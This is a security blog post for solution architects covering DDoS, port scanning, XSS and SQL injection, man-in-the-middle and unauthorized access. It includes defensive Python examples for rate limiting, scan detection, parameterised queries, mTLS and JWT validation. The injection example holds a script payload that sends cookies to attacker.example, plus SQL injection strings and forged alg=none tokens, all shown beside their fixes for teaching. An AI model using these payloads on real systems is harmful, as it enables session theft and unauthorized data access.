MM Ep-22 – 5 Security Attacks…an Architect’s 5-minute Survival Kit!

Security Attacks on a Digital Business

In this episode of Monday Muse, I would like to talk about 5 types of security attacks and how we, as Solution Architects, deal with them…

But before we go there…

Here are a few interesting data points to give you context:

  • AWS reported a massive DDoS attack in February 2020. At its peak, this attack saw incoming traffic at a rate of 2.3 Tbps (terabits per second).
  • In 2019, a hacker gained access to the personal information of over 100 million customers of a US bank, including some Social Security numbers and bank account details.
  • In July 2022, personal data on 5.4 million Twitter users, including email addresses and phone numbers, was reported stolen and offered for sale online.

These are just a few data points, but if you think about the legal and reputational implications of these and similar incidents, it is mind-numbing.

Read about a few of them here: https://www.csoonline.com/article/567531/the-biggest-data-breach-fines-penalties-and-settlements-so-far.html

So, if you are working for a customer in a regulated industry (banking, insurance, healthcare, even retail), one of the biggest helps you can extend to that customer is providing mitigations against these attacks.

Distributed Denial of Service

This is one of the most common forms of security attack. It overwhelms a target's resources.

The attackers flood the target with a massive volume of traffic or requests from many sources at once (hence "distributed"). This exhausts the system's resources, such as bandwidth, processing power, memory or connection tables.

As a result, the system becomes unable to respond to legitimate user requests, rendering it unavailable.

As Solution Architects of digital ecosystems exposed to external customers, we must include security controls that absorb and distribute traffic, mitigating the impact of volumetric DDoS attacks. In practice this means an anycast CDN or scrubbing service in front of the origin, so the flood is spread across a global edge with far more capacity than any single data centre and the origin is never reachable directly.

Akamai, mostly known as a CDN, also offers DDoS protection and web application firewall services that use real-time threat intelligence and traffic filtering to block malicious traffic at the edge.

Advanced firewalls and application delivery controllers (e.g. F5) mitigate DDoS attacks by detecting and dropping malicious traffic. They also offer rate limiting and traffic shaping to control and filter incoming requests, so that no single source can consume more than its share of the service.

F5 also uses behavioural analysis and anomaly detection to identify and block DDoS attack patterns. One caveat: such in-line devices help against application-layer (Layer 7) floods, but they can themselves be saturated by a multi-Tbps volumetric attack, which is why they sit behind, not instead of, the upstream scrubbing or CDN layer.
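Rate limiting is the one control in this list that is easy to reason about in code, so here is an added example (not code from the original post or from any of the vendors mentioned): a per-client token-bucket limiter of the kind an edge proxy or WAF applies before traffic reaches the origin, fed with a constructed stream of one legitimate user and one flooding source. Timestamps are in milliseconds and tokens in milli-tokens so the arithmetic is exact.

```python
# Added example (not from the original post): a per-client token-bucket
# rate limiter of the kind an edge proxy or WAF applies in front of the
# origin. Timestamps are in milliseconds and tokens in milli-tokens so the
# simulation is exact integer arithmetic. The traffic sample is constructed.
from dataclasses import dataclass, field

SCALE = 1000  # one request costs SCALE milli-tokens


@dataclass
class Bucket:
    tokens: int    # milli-tokens currently available
    last_ms: int   # time of the last refill


@dataclass
class RateLimiter:
    rate: int      # sustained requests per second allowed per client
    burst: int     # bucket capacity in requests (short bursts are tolerated)
    buckets: dict = field(default_factory=dict)

    def allow(self, client: str, now_ms: int) -> bool:
        cap = self.burst * SCALE
        b = self.buckets.get(client)
        if b is None:   # first sight of this client: start with a full bucket
            b = self.buckets[client] = Bucket(tokens=cap, last_ms=now_ms)
        # Refill in proportion to elapsed time; `rate` requests per second is
        # exactly `rate` milli-tokens per millisecond. Never exceed capacity.
        b.tokens = min(cap, b.tokens + (now_ms - b.last_ms) * self.rate)
        b.last_ms = now_ms
        if b.tokens >= SCALE:
            b.tokens -= SCALE
            return True
        return False    # bucket empty: drop (or queue/shape) this request


def run_simulation(requests, rate=10, burst=20):
    """requests: iterable of (timestamp_ms, client_ip). Returns a dict
    client_ip -> (allowed, dropped) after feeding the merged stream through
    one limiter, as an edge node would see it."""
    limiter = RateLimiter(rate=rate, burst=burst)
    stats = {}
    for ts, client in sorted(requests):
        allowed, dropped = stats.get(client, (0, 0))
        if limiter.allow(client, ts):
            stats[client] = (allowed + 1, dropped)
        else:
            stats[client] = (allowed, dropped + 1)
    return stats


# Constructed traffic: one legitimate user at 2 req/s for 10 s (20 requests)
# and one flooding source at 100 req/s over the same 10 s (1000 requests).
SAMPLE = [(i * 500, "203.0.113.10") for i in range(20)]
SAMPLE += [(i * 10, "198.51.100.7") for i in range(1000)]

if __name__ == "__main__":
    for client, (ok, dropped) in run_simulation(SAMPLE).items():
        print(f"{client}: allowed={ok} dropped={dropped}")
```

With a sustained rate of 10 req/s and a burst of 20, the legitimate user is never throttled, while the flooder gets its initial burst plus roughly ten requests per second and has the rest (881 of 1000) dropped. The design choice worth noting is that the limiter keys on the client, so shared NATs or a distributed attack from many addresses need a second dimension (per-URL or global budgets) on top of this.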

Port Scanning

This attack has also been around for decades.

Port scanning is reconnaissance: an attacker probes a target's network ports, systematically scanning for open ports to identify the listening services (and their versions) that may be vulnerable.

It helps attackers gather information for later exploitation or unauthorized access.

(Nmap and Angry IP Scanner are common port scanning tools used by hackers 😟 and, of course, by our own penetration testers)

We cannot stop bad actors from sending probes at a public IP address, so the goal is to minimise what a scan can find and to notice when one is happening: expose only the ports a service needs, default-deny everything else, and alert on scan patterns at the open or unsecured ports.

A strong firewall prevents unauthorized access to a business's private network. It controls which ports are reachable and visible, and it can detect when a port scan is in progress and block the scanning source.

Depending on what type of perimeter and/or application firewalls your customer uses, you should recommend network security policies and access controls: default-deny inbound rules with explicit allow-lists by source and port.

Check Point’s Quantum IPS provides protection against port scanning and other cyber threats.

F5’s firewall and intrusion prevention features detect and block suspicious port scanning activity.
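What "detects when a port scan is in progress" looks like in practice, as an added example that is not code from the original post or from any of the products above: a small detector run over firewall log lines. The log format and every log line are constructed for this example (a real firewall's fields differ, the logic does not), and it flags the classic vertical-scan signature: one source touching many distinct ports on one host inside a short window.

```python
# Added example (not from the original post): port-scan detection run over
# firewall logs. The log format and all log lines are constructed for this
# example; a real firewall's fields differ but the logic is the same.
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) src=(?P<src>[\d.]+) "
    r"dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+) proto=(?P<proto>\w+)$"
)


def parse_line(line):
    """One connection record as a dict, or None for lines that are not records."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "action": m["action"], "src": m["src"],
            "dst": m["dst"], "dport": int(m["dport"]), "proto": m["proto"]}


def detect_scans(lines, window_s=60, port_threshold=10):
    """Vertical-scan signature: one source touching >= port_threshold distinct
    ports on one host within window_s seconds. Both ALLOW and DENY records
    count, since a scan hits open and closed ports alike. Returns one alert
    (src, dst, first_seen_iso, distinct_ports) per offending pair."""
    recent = defaultdict(deque)    # (src, dst) -> deque of (ts, dport)
    alerted = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        key = (ev["src"], ev["dst"])
        q = recent[key]
        q.append((ev["ts"], ev["dport"]))
        while (ev["ts"] - q[0][0]).total_seconds() > window_s:
            q.popleft()                       # slide the window forward
        ports = {port for _, port in q}
        if len(ports) >= port_threshold and key not in alerted:
            alerted.add(key)                  # alert once per pair, not per packet
            alerts.append((ev["src"], ev["dst"], q[0][0].isoformat(), len(ports)))
    return alerts


# Constructed log: a slow scanner (192.0.2.44, one port every two minutes),
# a fast scanner (198.51.100.7, twelve ports in twelve seconds), a normal
# user (203.0.113.10) and one line of noise that the parser must skip.
SAMPLE_LOG = """\
2024-03-01T09:55:00Z DENY src=192.0.2.44 dst=10.0.0.5 dport=21 proto=tcp
2024-03-01T09:57:00Z DENY src=192.0.2.44 dst=10.0.0.5 dport=22 proto=tcp
2024-03-01T09:59:00Z DENY src=192.0.2.44 dst=10.0.0.5 dport=23 proto=tcp
2024-03-01T10:00:00Z DENY src=198.51.100.7 dst=10.0.0.5 dport=21 proto=tcp
2024-03-01T10:00:01Z DENY src=198.51.100.7 dst=10.0.0.5 dport=22 proto=tcp
2024-03-01T10:00:02Z DENY src=198.51.100.7 dst=10.0.0.5 dport=23 proto=tcp
2024-03-01T10:00:03Z DENY src=198.51.100.7 dst=10.0.0.5 dport=25 proto=tcp
2024-03-01T10:00:04Z DENY src=198.51.100.7 dst=10.0.0.5 dport=53 proto=tcp
2024-03-01T10:00:05Z ALLOW src=203.0.113.10 dst=10.0.0.5 dport=443 proto=tcp
2024-03-01T10:00:05Z ALLOW src=198.51.100.7 dst=10.0.0.5 dport=80 proto=tcp
2024-03-01T10:00:06Z DENY src=198.51.100.7 dst=10.0.0.5 dport=110 proto=tcp
2024-03-01T10:00:07Z DENY src=198.51.100.7 dst=10.0.0.5 dport=135 proto=tcp
this line is log-rotation noise and is ignored by the parser
2024-03-01T10:00:08Z DENY src=198.51.100.7 dst=10.0.0.5 dport=139 proto=tcp
2024-03-01T10:00:09Z DENY src=198.51.100.7 dst=10.0.0.5 dport=143 proto=tcp
2024-03-01T10:00:10Z ALLOW src=198.51.100.7 dst=10.0.0.5 dport=443 proto=tcp
2024-03-01T10:00:11Z DENY src=198.51.100.7 dst=10.0.0.5 dport=445 proto=tcp
2024-03-01T10:01:00Z DENY src=192.0.2.44 dst=10.0.0.5 dport=25 proto=tcp
2024-03-01T10:03:00Z DENY src=192.0.2.44 dst=10.0.0.5 dport=53 proto=tcp
2024-03-01T10:05:00Z ALLOW src=203.0.113.10 dst=10.0.0.5 dport=80 proto=tcp
""".splitlines()

if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_LOG):
        print("port scan:", alert)
```

With the defaults (10 ports in 60 s) only the fast scanner is reported, and it is reported once, when its tenth distinct port arrives. The slow scanner never has more than one probe inside the window, which is exactly the trade-off a practitioner has to tune: widening the window to ten minutes and lowering the threshold to five catches it too, at the cost of more state per source and more false positives from chatty legitimate clients.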

Cross Site Scripting & SQL Injection

This is also very common, and one of the primary reasons we do penetration testing of an application before rolling it out to production is to assess its vulnerability in this regard.

SQL injection is the server-side counterpart of XSS: untrusted input is concatenated into a database query and executed as SQL, letting an attacker read or modify data the query was never meant to touch. Both stem from the same root cause, mixing untrusted data with code, and both have the same class of fix: parameterised queries on the database side and context-aware output encoding on the browser side.

Cross-site scripting (XSS) occurs when malicious code is injected into a trusted website. Attackers exploit missing input validation and output encoding, allowing them to inject scripts that the site then serves to other users.

These scripts run in the context of victim users’ browsers, leading to unauthorized actions. XSS can steal sensitive user information, manipulate website content, or perform phishing attacks.

It poses a threat to user privacy, compromises system integrity, and undermines trust in websites.

CORS (Cross-Origin Resource Sharing) is a security mechanism enforced by web browsers. It controls and restricts cross-origin requests made by web applications.

A CORS policy in the API Gateway controls which web origins a browser is allowed to read API responses from. Two caveats a practitioner should keep in mind: CORS is enforced only by browsers, so it is not an access control for the back end (curl or a script ignores it entirely), and it does not protect against XSS at all, since an injected script runs inside the victim's own origin where CORS does not apply. It limits some CSRF, but "simple" requests such as HTML form posts are sent without a preflight, so CSRF still needs anti-CSRF tokens or SameSite cookies.

A web application firewall (WAF) protects web applications from a variety of application layer attacks such as cross-site scripting (XSS), SQL injection, and cookie poisoning, among others.

Content Security Policy (CSP) is a response header that tells the browser which sources of scripts, styles, images and other content a page may load. A strict policy (for example script-src 'self' with no 'unsafe-inline') means an injected inline <script> simply does not execute, which blunts XSS even when an encoding bug slips through.

CSP adds an additional layer of protection to web applications and strengthens overall security; it is a mitigation on top of fixing the injection, not a replacement for it.
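The two flaws side by side, as an added example that is not code from the original post: an in-memory SQLite table with constructed rows, a user lookup written the vulnerable way and the parameterised way, and a profile page rendered with and without output encoding, plus the CSP header from the paragraph above returned as a response header. All names, rows and payloads are constructed.

```python
# Added example (not from the original post): the vulnerable form of a
# user lookup and a profile page beside the hardened form. The SQLite table
# and its rows are constructed for the example.
import html
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, bio TEXT, is_admin INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "Likes <b>bold</b> text", 1),
        ("bob", "Just here for the memes", 0),
    ])
    return db


# --- SQL injection -----------------------------------------------------

def find_user_vulnerable(db, username):
    # String concatenation: the caller's input becomes part of the SQL text,
    # so a quote character lets the attacker rewrite the WHERE clause.
    sql = f"SELECT username, is_admin FROM users WHERE username = '{username}'"
    return db.execute(sql).fetchall()


def find_user_safe(db, username):
    # Parameterised query: the driver binds the value as data, so the same
    # payload is just an (unmatched) username.
    sql = "SELECT username, is_admin FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchall()


SQLI_PAYLOAD = "' OR '1'='1"          # turns the WHERE clause into a tautology
SQLI_COMMENT_PAYLOAD = "alice' --"    # matches alice, then comments out the rest


# --- Cross-site scripting -----------------------------------------------

def render_profile_vulnerable(username, bio):
    # Raw interpolation of user-controlled text into HTML.
    return f"<h1>{username}</h1><p>{bio}</p>"


def render_profile_safe(username, bio):
    # Context-aware output encoding: <, >, &, " and ' become entities, so the
    # browser shows the payload as text instead of executing it.
    return f"<h1>{html.escape(username)}</h1><p>{html.escape(bio)}</p>"


XSS_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def security_headers():
    # Defence in depth: with no 'unsafe-inline', an injected inline <script>
    # does not run even if an encoding bug slips through. Sent alongside the
    # escaped HTML, not instead of it.
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                                   "object-src 'none'; base-uri 'none'",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_user_vulnerable(db, SQLI_PAYLOAD))   # every row
    print("safe:      ", find_user_safe(db, SQLI_PAYLOAD))         # []
    print(render_profile_vulnerable("mallory", XSS_PAYLOAD))
    print(render_profile_safe("mallory", XSS_PAYLOAD))
```

Run it and the tautology payload returns every row (including the admin flag) from the concatenated query and nothing from the parameterised one, while the same script payload comes back as a literal &lt;script&gt; from the escaped renderer. A WAF in front would likely catch these textbook payloads, but the fix that survives an encoded or novel variant is the one in the code.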

Man-in-the-middle attack

In a Man-in-the-Middle (MITM) attack, an attacker intercepts communication between two parties. The attacker secretly relays and possibly alters the messages exchanged between the parties.

This attack exploits insecure network protocols, missing certificate validation or weak encryption. Man-in-the-Middle attacks can capture sensitive information, such as login credentials or financial data.

It undermines confidentiality, integrity, and trust in the compromised system’s communication.

You can read about the different types of Man-in-the-Middle attack here:

https://cheapsslsecurity.com/blog/types-of-man-in-the-middle-attacks/

Modern applications are distributed: application components are hosted in separate subnets, VPCs, cloud providers, data centres or even different enterprises. To avoid man-in-the-middle attacks, the communication among the components must be secured at the transport layer.

Mutual TLS (mTLS) ensures encrypted and mutually authenticated communication between application components: the server presents a certificate as in ordinary TLS, and the client must present one too.

mTLS provides strong identity verification, preventing unauthorized access and impersonation attacks. It encrypts data in transit, safeguarding it from interception and tampering. Two caveats: each side must actually verify the peer's certificate against a private CA it trusts (a context that accepts any certificate gives encryption without authentication), and the identity in the certificate still has to be authorised, since a valid certificate proves who the peer is, not what it may call.

It establishes a trust framework, enabling secure communication even in untrusted network environments.
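The server-side setting that makes the difference, as an added example using Python's standard ssl module (not code from the original post): one-way TLS beside mTLS, the matching client context, and the authorisation step on the identity carried by the client certificate. The certificate file paths are placeholders, and the peer certificate dictionaries and allowed caller identities are constructed in the shape that ssl.SSLSocket.getpeercert() returns.

```python
# Added example (not from the original post): configuring mutual TLS with
# Python's standard ssl module, and authorising the peer on the identity its
# certificate carries. File paths, CA and identities are placeholders
# constructed for the example; a real deployment loads its own PKI.
import ssl


def apply_policy(ctx, require_client_cert):
    """Shared settings. TLS 1.0/1.1 are disabled; verify_mode decides whether
    a server demands a client certificate (mTLS) or accepts anyone (one-way)."""
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.verify_mode = ssl.CERT_REQUIRED if require_client_cert else ssl.CERT_NONE
    return ctx


def policy_summary(require_client_cert):
    """Build a server context without keys and report the effective policy."""
    ctx = apply_policy(ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER), require_client_cert)
    return {"min_version": ctx.minimum_version.name, "verify_mode": ctx.verify_mode.name}


def server_context(certfile, keyfile, client_ca=None):
    """client_ca=None is ordinary TLS: the client verifies us, anyone may
    connect. With a CA file the handshake fails unless the client presents a
    certificate that chains to that (private) CA."""
    ctx = apply_policy(ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER),
                       require_client_cert=client_ca is not None)
    ctx.load_cert_chain(certfile, keyfile)
    if client_ca is not None:
        ctx.load_verify_locations(cafile=client_ca)   # trust only our CA
    return ctx


def client_context(server_ca, certfile, keyfile):
    """PROTOCOL_TLS_CLIENT already sets verify_mode=CERT_REQUIRED and
    check_hostname=True, so the server is checked against our CA and its
    name; load_cert_chain adds the client's own identity for mTLS."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.load_verify_locations(cafile=server_ca)
    ctx.load_cert_chain(certfile, keyfile)
    return ctx


def peer_identities(peercert):
    """Identities from a cert in the dict form ssl.SSLSocket.getpeercert()
    returns: URI SANs (SPIFFE-style) and DNS SANs first, then the subject CN
    as a legacy fallback."""
    ids = [v for kind, v in peercert.get("subjectAltName", ()) if kind in ("URI", "DNS")]
    for rdn in peercert.get("subject", ()):
        ids.extend(v for k, v in rdn if k == "commonName")
    return ids


def authorize_peer(peercert, allowed):
    """A valid certificate proves who the peer is, not what it may call; this
    is the authorisation step. getpeercert() returns {} when no certificate
    was verified (CERT_NONE), so an empty dict is rejected as well."""
    if not peercert:
        return None
    for ident in peer_identities(peercert):
        if ident in allowed:
            return ident
    return None


# Constructed peer certificates, shaped like getpeercert() output.
PAYMENTS_CERT = {
    "subject": ((("commonName", "payments.internal"),),),
    "subjectAltName": (("DNS", "payments.internal"),
                       ("URI", "spiffe://example.internal/ns/prod/sa/payments")),
}
REPORTING_CERT = {
    "subject": ((("commonName", "reporting.internal"),),),
    "subjectAltName": (("DNS", "reporting.internal"),),
}
ALLOWED_CALLERS = {"spiffe://example.internal/ns/prod/sa/payments",
                   "spiffe://example.internal/ns/prod/sa/orders"}

if __name__ == "__main__":
    print("one-way:", policy_summary(False))
    print("mTLS:   ", policy_summary(True))
    print("payments ->", authorize_peer(PAYMENTS_CERT, ALLOWED_CALLERS))
    print("reporting ->", authorize_peer(REPORTING_CERT, ALLOWED_CALLERS))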

Unauthorized Access

Every application we build, every solution we design, must prevent unauthorized access.

(In fact, it is so basic that I almost removed this section; it is included just for reference 🙂)

Unauthorized access happens when a request reaches a protected resource without a valid, verified credential: a missing or unvalidated token, an endpoint that forgets to check authorization, or a check that trusts the token's claims without verifying its signature. The attacker exploits such gaps in the authentication and authorization process.

The vulnerability undermines the system's access control and compromises data confidentiality and integrity.

Most established API Gateways offer authentication and access control mechanisms to secure API endpoints. Most commonly they accept OAuth 2.0 bearer tokens (RFC 6749, RFC 6750) issued by an OpenID Connect provider, and client authentication with JWT assertions (RFC 7523). Note that the OAuth 2.0 implicit flow is deprecated by the OAuth 2.0 Security Best Current Practice in favour of the authorization code flow with PKCE (RFC 7636).

They terminate TLS, so API communications are encrypted in transit, ensuring data confidentiality.

They validate and authorize API requests, checking the request origin, the token's signature and claims (issuer, audience, scope) and its expiry (TTL) before forwarding to the back end.
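The checks in that last sentence, as an added example that is not code from the original post or from any gateway product: a gateway-style validator for JWT bearer tokens (RFC 7519), written with the standard library only. It uses HS256 so the example can mint its own tokens; the secret, issuer, audience, claims and clock are constructed for the example, and a real gateway normally verifies RS256/ES256 tokens against the provider's JWKS instead.

```python
# Added example (not from the original post): bearer-token validation of the
# kind an API gateway performs before forwarding a request. HS256 JWTs are
# minted and verified with the standard library only; the secret, issuer,
# audience and claims are constructed for the example.
import base64
import hashlib
import hmac
import json
import time

SECRET = b"constructed-example-secret-do-not-reuse"
ISSUER = "https://idp.example"
AUDIENCE = "orders-api"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_token(claims, secret=SECRET):
    """What the identity provider does; shown so the example is self-contained."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


class TokenError(Exception):
    pass


def validate_token(token, secret, issuer, audience, required_scope, now=None):
    """Gateway-side checks, in order: structure, algorithm pinned by the
    gateway (never taken from the token), signature, then the claims:
    issuer, audience, expiry/TTL, not-before, scope. Returns the claims."""
    now = time.time() if now is None else now
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        signature = b64url_decode(s)
    except ValueError:                         # wrong part count, bad base64 or JSON
        raise TokenError("malformed token")
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise TokenError("unexpected alg")     # blocks the alg=none trick
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):   # constant-time compare
        raise TokenError("bad signature")
    try:
        claims = json.loads(b64url_decode(p))
    except ValueError:
        raise TokenError("malformed token")
    if not isinstance(claims, dict):
        raise TokenError("malformed token")
    if claims.get("iss") != issuer:
        raise TokenError("wrong issuer")
    aud = claims.get("aud")
    if audience not in (aud if isinstance(aud, list) else [aud]):
        raise TokenError("wrong audience")     # a token for another API is not ours
    if not isinstance(claims.get("exp"), (int, float)) or now >= claims["exp"]:
        raise TokenError("expired")
    if claims.get("nbf", 0) > now:
        raise TokenError("not yet valid")
    if required_scope not in str(claims.get("scope", "")).split():
        raise TokenError("insufficient scope")
    return claims


def verdict(token, now, secret=SECRET):
    """'ok' or the rejection reason, for the demo and tests."""
    try:
        validate_token(token, secret, ISSUER, AUDIENCE, "orders:read", now=now)
        return "ok"
    except TokenError as e:
        return str(e)


NOW = 1_700_000_000   # fixed clock so the example is reproducible
GOOD = mint_token({"iss": ISSUER, "aud": AUDIENCE, "sub": "alice",
                   "scope": "orders:read", "iat": NOW, "exp": NOW + 300})


def tampered_token():
    """Re-use GOOD's header and signature with a forged payload."""
    h, _, s = GOOD.split(".")
    forged = b64url(json.dumps({"iss": ISSUER, "aud": AUDIENCE, "sub": "mallory",
                                "scope": "orders:read orders:write",
                                "exp": NOW + 300}).encode())
    return f"{h}.{forged}.{s}"


def alg_none_token():
    """Classic attack: an unsigned token whose header claims alg=none."""
    _, p, _ = GOOD.split(".")
    return f'{b64url(json.dumps({"alg": "none"}).encode())}.{p}.'


if __name__ == "__main__":
    print("valid token        :", verdict(GOOD, NOW))
    print("same token, later  :", verdict(GOOD, NOW + 301))
    print("forged payload     :", verdict(tampered_token(), NOW))
    print("alg=none           :", verdict(alg_none_token(), NOW))
```

Two design points matter here. The algorithm is fixed by the gateway and compared against the header rather than read from it, which is what defeats the alg=none and algorithm-confusion tricks, and the signature is verified before any claim is trusted, so a forged payload is rejected for its signature and never reaches the issuer or scope checks.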

Conclusion

Security attacks pose serious threats to the protection of sensitive data and resources. They threaten the integrity and reliability of the components of a distributed digital ecosystem.

Security mechanisms safeguard against cyber threats such as malware, hacking and data breaches.

They help protect our customers against bad actors and the risks they bring, and so help the customers maintain their reputation and avoid the drain of financial resources from litigation.

If you think about it, these are also opportunities for us as Architects.

We can help with systematic analysis (even modelling) of threats, and mitigate or eliminate those threats by recommending suitable controls.

An architected solution is only as good (or as bad) as its weakest link, and that weakest link sometimes turns out to be a missing security control. That can be a costly mistake.

That’s all this week!

Till next week…